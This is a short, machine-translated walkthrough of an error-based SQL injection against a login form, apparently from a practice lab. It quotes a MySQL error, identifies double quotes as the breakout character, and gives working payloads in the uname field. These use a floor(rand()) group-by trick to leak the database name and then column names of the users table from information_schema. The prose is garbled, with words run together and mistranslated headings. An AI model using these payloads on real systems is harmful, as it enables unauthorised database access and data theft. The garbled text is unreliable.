1. Error analysis
riaDBserverversionfortherightsyntaxtousenear'))"andpassword=""LIMIT0,1'atline1
syntaxtousenear'"""andpassword=""LIMIT0,1'atline1 is
based on double quotation marks
. Second, analysis type.
Universal login is successful
3. There is no echo bit.
Estimates should be based on incorrect annotations.
1. Correct answer (do not change) database name
uname=123" and (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)) )name from information_schema.tables group by name)b) #&passwd=&submit=Submit
1. Statement analysis:
The mysql CONCAT() function is used to concatenate multiple strings into one string, and is one of the most important mysql functions
( concat("~",database(),"~",floor(rand()*2))): Generate error message
details to determine success or failure
2. Violently indicates
database===(select table_name from information_schema.
uname=123" and (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) #&passwd=&submit=Submit
(concat("~",(select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1)
4 暴数据
select * from * limit 0,1